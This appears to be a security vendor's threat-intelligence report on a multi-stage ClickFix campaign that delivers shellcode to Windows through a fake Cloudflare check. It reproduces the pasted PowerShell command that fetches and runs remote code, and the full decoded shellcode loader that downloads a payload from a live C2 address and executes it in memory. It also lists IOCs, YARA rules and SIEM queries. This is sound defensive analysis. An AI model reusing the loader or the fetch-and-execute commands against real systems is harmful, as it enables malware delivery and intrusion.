Omegatech ClickFix v8
Complete Kill Chain Report

Multi-Stage ClickFix Campaign — Full In-Memory Execution

Omegatech LTD (AS202412) operates a sophisticated, multi-stage ClickFix campaign delivering in-memory shellcode to Windows endpoints through social engineering, PowerShell abuse, and reflective code loading.

A victim visiting an attacker-controlled or compromised page is presented with a fake Cloudflare human-verification challenge. The victim is instructed to paste a PowerShell command into Windows Terminal — the ClickFix technique — which silently downloads and executes a three-stage attack chain entirely in memory, leaving no persistent disk artifact.

The final shellcode stage runs inside the PowerShell process, bypassing traditional file-based AV/EDR detection. The real Cloudflare Turnstile widget is purely browser-side JavaScript — it never instructs users to paste commands into a terminal.

Omegatech LTD Profile

Omegatech LTD operates as a BPH provider under AS202412 out of Seychelles. Infrastructure in the 158.94.208.0/24 range hosts both the stage-2 delivery server (158.94.208.92) and the stage-3 shellcode server (158.94.208.104). Prior SecureLeaf operations have attributed multiple ClickFix and EtherHiding campaigns to this infrastructure cluster.

Sandbox Detonation Environment

Kill Chain Diagram

Clipboard Delivery — Command Analysis

Execution surface confirmed as Windows Terminal (wt.exe) via shell artifact JHYQWG48ACLVJ4LTNB28_temp_12.dr, which also reveals the victim username (Maoga) and hostname (pc-tj472). Default Ctrl+V paste keybinding confirmed via Terminal settings artifact.

// Command pasted (from ConsoleHost_history.txt)

# Line 1 — Decoy (legit debloat project used as cover)
& ([scriptblock]::Create((irm "https://debloat.raphi.re/")))

# Line 2 — Actual ClickFix payload
$global:cfChallenge="challenge.cloudflare.com"
$global:challengeHash="e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
$global:confirmChallenge=$true
iex(irm 158.94.208.92 -UseBasicParsing)

// Command breakdown

// HTTP request captured in PCAP

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.4111
Host: 158.94.208.92
Connection: Keep-Alive

The User-Agent leaks the victim's exact PowerShell build and OS version to the C2. This enables server-side targeting — serving different payloads per OS version, or killing the chain for sandbox User-Agents.

Forensic note: ConsoleHost_history.txt (PSReadLine) at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt records every pasted command. Its presence with these exact strings is a reliable IOC even when no other logging is enabled.

Server-Served PowerShell Loader

Apache/2.4.66 (Debian) at 158.94.208.92 responds at 2026-06-08T20:31:08Z with a 1,604-byte PowerShell script, executed immediately by iex in the victim session.

// Full decoded stage-2 script

$UGiQQFlZ = "http://158.94.208.104/x7GkP2mQ9zL4/my_newest_ll.png"
try {
    $pNqJcXZej   = Invoke-WebRequest -Uri $UGiQQFlZ -UseBasicParsing -ErrorAction Stop
    $iNqccoGcJHGU = $pNqJcXZej.Content
    $lIFnrGdJPyXrlqg = $iNqccoGcJHGU.Length

    $YwzNPctdNfuIuwh = @"
using System;
using System.Runtime.InteropServices;
public class dIZYizFl {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr VirtualAlloc(IntPtr a, uint sz, uint t, uint p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf, out uint tid);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern uint WaitForSingleObject(IntPtr h, uint ms);
}
"@
    Add-Type -TypeDefinition $YwzNPctdNfuIuwh
    $gPsZOQX  = 0x1000   # MEM_COMMIT
    $lUrLsWZS = 0x2000   # MEM_RESERVE
    $nmTdojJq = 0x40     # PAGE_EXECUTE_READWRITE
    $eWhuhaSjHwRtnjIsjX = [dIZYizFl]::VirtualAlloc(
        [IntPtr]::Zero, $lIFnrGdJPyXrlqg,
        $gPsZOQX -bor $lUrLsWZS, $nmTdojJq)
    if ($eWhuhaSjHwRtnjIsjX -eq [IntPtr]::Zero) { throw "Alloc failed" }
    [System.Runtime.InteropServices.Marshal]::Copy(
        $iNqccoGcJHGU, 0, $eWhuhaSjHwRtnjIsjX, $lIFnrGdJPyXrlqg)
    $yuUuVIPZMRPlFzb = 0
    $PeGXxCfcT = [dIZYizFl]::CreateThread(
        [IntPtr]::Zero, 0, $eWhuhaSjHwRtnjIsjX,
        [IntPtr]::Zero, 0, [ref]$yuUuVIPZMRPlFzb)
    if ($PeGXxCfcT -eq [IntPtr]::Zero) { throw "Thread failed" }
    [dIZYizFl]::WaitForSingleObject($PeGXxCfcT, 30000) | Out-Null
    Write-Host "done."
}
catch { exit 1 }

// Step-by-step execution breakdown

Final Shellcode — Unknown Family

URL: http://158.94.208.104/x7GkP2mQ9zL4/my_newest_ll.png

The final payload was not captured in the sandbox (stage-3 connection to 158.94.208.104 not observed in PCAP — possible sandbox network block or deliberate environment fingerprinting evasion).

Based on campaign context and the 30-second WaitForSingleObject timeout, the implant is likely one of:

• → A stager connecting back to a third C2 for a full RAT/backdoor
• → Cobalt Strike beacon, Sliver implant, or custom Omegatech backdoor
• → Credential harvester or keylogger

The /x7GkP2mQ9zL4/ directory component (12 random characters) suggests per-campaign or per-victim path rotation, making static URL blocking insufficient as a standalone defense.

SL-MEM-2026-v8 — Sandbox Crash Dump Findings

Following an intentional sandbox crash of the v8 payload, 16 memory region dumps were recovered across 5 processes. Static analysis (strings, entropy, magic bytes, IOC extraction) was performed — no execution of dump contents. Source: SL-MEM-2026-v8, analyst: SecureLeaf/Dispensight, 2026-06-09.

// Process map — 5 PIDs, 16 regions

// In-memory process architecture

[PID 992]  — HTTP client thread
  └─ contacted 158.94.208.104:80 → cached HTTP 404 response (Apache/2.4.52 Ubuntu)
     ↓
[PID 4448] — Main malware process
  ├─ Thread 1563: PSReadLine / PowerShell host  (Stage-2 delivery surface)
  ├─ Thread 1556: .NET assembly loading          (RSA key blob — signed payload verification)
  ├─ Thread 1593: ASP.NET/WCF large assembly     (TDS code or downloaded .NET DLL, 1.8MB)
  ├─ Thread 1607: qb4p11bz.dll stub             (entropy 0.41 — caught mid-staging)
  ├─ Thread 1608: ENCRYPTED SHELLCODE BLOB      (entropy 7.24 — primary payload)
  └─ Thread 1609: Zeroed staging region          (IP 158.94.208.104 + powershell residue)
     ↓
[PID 820]  — Loader / injector process
  ├─ Threads 1610–1614: MZER region ×5 — WATCHDOG PATTERN
  │     VA range 0x1B7073B0000–3FD000, 315,392 bytes, same across all 5 threads
  │     Entropy variance 5.6818→5.7252 (per-thread mutable state — key or counter)
  │     Artifacts: size95.exe (UTF-16LE wide), MyApplication.app, mscoree.dll
  └─ Thread 1618: Standard PE (injected DLL / loaded dependency)
     ↓
[PID 5148] — .NET CLR host
  └─ Named pipes: \\.\pipe\CPFATP_  ·  \\.\pipe\Sessions
     (CLR profiler abuse or inter-process C2 channel)
     ↓
[PID 5252] — WinUI/XAML process (lure application shell)

// Notable observations

// New IOCs from memdump analysis

Network

Files & Executables

Behavioral / In-Memory

Cryptographic Material — Pending Analysis

// YARA rules — memdump-derived (SL-YARA-2026-v8-001 through 004)

Four additional rules derived from memdump static analysis. Complement the three lure/loader rules in the YARA section below.

rule SL_ClickFix_v8_MZER_Loader {
    meta:
        description = "ClickFix v8 — MZER custom loader stub with x64 PIC bootstrapper"
        author      = "SecureLeaf / Dispensight"
        reference   = "SL-MEM-2026-v8"  date = "2026-06-09"  tlp = "AMBER"
    strings:
        // MZER magic + PIC CALL/POP/SUB chain (highest confidence — exact match)
        $mzer_pic_full = { 4D 5A 45 52 E8 00 00 00 00 59 48 83 E9 09 48 8B }
        // MZER magic only
        $mzer_magic    = { 4D 5A 45 52 }
        // PIC CALL/POP/SUB bootstrapper (may appear offset from start in injected regions)
        $pic_stub      = { E8 00 00 00 00 59 48 83 E9 ?? 48 8B }
        // "size95.exe" UTF-16LE wide string
        $size95_wide   = { 73 00 69 00 7A 00 65 00 39 00 35 00 2E 00 65 00 78 00 65 00 }
        $myapp_wide    = "MyApplication.app" wide
    condition:
        ($mzer_pic_full at 0) or
        ($mzer_magic at 0 and $pic_stub) or
        ($mzer_magic at 0 and $size95_wide) or
        ($mzer_magic at 0 and $myapp_wide and $pic_stub)
}

import "math"

rule SL_ClickFix_v8_Shellcode_Blob {
    meta:
        description = "ClickFix v8 — Encrypted PIC shellcode blob, CALL-based entry, entropy 7.24"
        author      = "SecureLeaf / Dispensight"
        reference   = "SL-MEM-2026-v8"  date = "2026-06-09"  tlp = "AMBER"
        note        = "CALL target +0x6DC0 = decryptor entry. Likely XOR or RC4 key at that offset."
    strings:
        // Exact 8-byte header from PID 4448 region 1608
        $sc_sig      = { E8 C0 6D 00 00 C0 6D 00 }
        // Generic PIC CALL at offset 0
        $call_entry  = { E8 ?? ?? 00 00 }
    condition:
        ($sc_sig at 0) or
        (
            not uint16(0) == 0x5A4D       // not MZ
            and $call_entry at 0
            and filesize >= 40KB and filesize <= 512KB
            and math.entropy(0, filesize) >= 6.8
        )
}

rule SL_ClickFix_v8_TempDrop_DLL {
    meta:
        description = "ClickFix v8 — 8-char randomized temp DLL staging artifact (qb4p11bz.dll pattern)"
        author      = "SecureLeaf / Dispensight"
        reference   = "SL-MEM-2026-v8"  date = "2026-06-09"  tlp = "AMBER"
    strings:
        $exact_ascii  = "qb4p11bz.dll" ascii
        $exact_wide   = "qb4p11bz.dll" wide
        $rnd_dll_wide = /[a-z0-9]{8}\.dll/ wide
        $kernel32_w   = "KERNEL32.dll" wide
        $mscoree_w    = "mscoree.dll" wide
    condition:
        $exact_ascii or $exact_wide or
        (
            $rnd_dll_wide and $kernel32_w and $mscoree_w
            and math.entropy(0, filesize) < 2.0
        )
}

rule SL_ClickFix_v8_C2_Beacon_Region {
    meta:
        description = "ClickFix v8 — C2 IP 158.94.208.104 + WINHTTP/PS beacon in memory region"
        author      = "SecureLeaf / Dispensight"
        reference   = "SL-MEM-2026-v8"  date = "2026-06-09"  tlp = "AMBER"
        ioc_ip      = "158.94.208.104"
    strings:
        $c2_ip         = "158.94.208.104" ascii wide
        $apache_banner = "Apache/2.4.52 (Ubuntu) Server at 158.94.208.104" ascii
        $winhttp       = "WINHTTP.dll" ascii wide
        $advapi        = "ADVAPI32.dll" ascii wide
        $ps_str        = "powershell" ascii nocase
    condition:
        $c2_ip and
        ($apache_banner or ($winhttp and $advapi) or $ps_str)
}

Artifact Summary

Real-Time File System Protection — 7 Detections

ESET real-time file system protection intercepted 7 malicious files written by chrome.exe to the victim's Downloads folder across a 17-second window (12:35:25–12:35:42). All files were cleaned by deletion before execution. The detections span three malware families, directly corroborating the kill chain stages and memdump process architecture.

// Raw ESET HIPS log — all 7 events

★ Rozena.BI row highlighted — linchpin detection tying AV telemetry to PCAP and memdump. All events triggered by chrome.exe SHA1 DC03E6394743FE3983B5573B589951041B225DE6 (verified clean — untampered Chrome binary).

// ESET family → kill chain stage mapping

// Download window analysis

// SHA1 hashes — ESET-confirmed malicious (VT pivot targets)

IOCs

// Network

// Files

// Behavioral Strings

MITRE ATT&CK Techniques

Three Lure/Loader Rules + Four Memdump Rules

The three rules below target the lure and PS loader stages. Four additional memdump-derived rules (MZER loader, shellcode blob, temp DLL, C2 beacon) are in the Memory Dump Analysis section above. All seven rules are included in the STIX bundle.

SIEM / EDR Query Examples

# SIEM — PowerShell ScriptBlock log (EID 4104)
event.id:4104 AND process.command_line:*cfChallenge* AND process.command_line:*iex*

# SIEM — Add-Type + VirtualAlloc in same session
event.id:4104 AND process.command_line:*Add-Type* AND process.command_line:*VirtualAlloc*

# EDR — csc.exe spawned by powershell.exe
process.name:csc.exe AND process.parent.name:powershell.exe

# Proxy / Firewall — HTTP to Omegatech range
dst.ip:158.94.208.0/24 AND network.protocol:http

# EDR — Named pipe creation matching MZER watchdog pattern (memdump-derived)
event.id:17 AND pipe.name:CPFATP_*

# EDR — Non-standard PE magic in written file (MZER loader, memdump-derived)
file.header_bytes:4d5a4552*

# Proxy — PowerShell UA to non-Microsoft, non-allowlisted IP
http.user_agent:*WindowsPowerShell* AND NOT dst.ip:<corp_allowlist>

# EDR — UseBasicParsing + iex in same command
process.command_line:*UseBasicParsing* AND process.command_line:*iex*

# File — New .cs file in %TEMP% followed by csc.exe spawn
file.path:*\\Temp\\*.cs AND event.id:1 (process create)

# EDR — 8-char random DLL loaded from %TEMP% / %APPDATA% (memdump-derived)
image.path:(*\\Temp\\* OR *\\AppData\\*) AND image.name:/^[a-z0-9]{8}\.dll$/

# EDR — WinHTTP connection to 158.94.208.104 outside browser context (memdump-derived)
network.destination.ip:158.94.208.104 AND NOT process.name:(chrome.exe OR firefox.exe OR msedge.exe)

# EDR — Identical memory region mapped across 5+ threads same PID (watchdog pattern)
memory.region.protection:RWX AND memory.region.thread_count:>=5 AND process.name:*.exe

Defensive Measures

Detonation Sequence

Total time from paste to active shellcode: ~1 second. Total C2 interaction window: ~31 seconds. ESET HIPS download burst: 17 seconds, 7 files, 3 families.

SecureLeaf / Dispensight